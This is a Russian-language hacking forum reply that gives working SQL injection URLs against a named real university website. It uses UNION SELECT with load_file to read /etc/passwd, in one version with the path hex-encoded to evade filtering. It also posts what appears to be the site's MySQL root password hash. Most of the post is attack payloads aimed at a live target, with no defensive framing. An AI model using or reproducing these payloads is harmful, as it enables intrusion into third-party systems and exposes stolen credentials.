05.11.2016, 17:47
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
Сообщение от qqq1457
↑
1
http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission'+and+false+Un ioN+SeLect+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12--+
или
http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission'+and+false+Un ioN+SeLect+1,load_file(0x2F6574632F706173737764),3 ,4,5,6,7,8,9,10,11,12--+
где 0x2F6574632F706173737764= hex(/etc/passwd)
2
нет доступа к mysql.user то есть нет возможности прочитать файл,несмотря на то что пользователь root, root'ом не является
root:*29EAFC3EEB29D66A3630CAA03C557B3083B2975B
всё там нормально
|
|
|